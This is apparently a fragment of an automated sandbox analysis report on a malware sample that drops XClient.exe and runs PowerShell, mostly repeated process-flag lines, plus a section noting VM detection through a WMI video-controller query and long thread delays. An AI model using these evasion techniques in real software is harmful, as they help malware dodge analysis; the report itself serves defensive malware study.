Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Memory allocated: D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Memory allocated: 1ABE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 14E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1AE80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 7E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1A5A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\z0LTqIdZ4A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
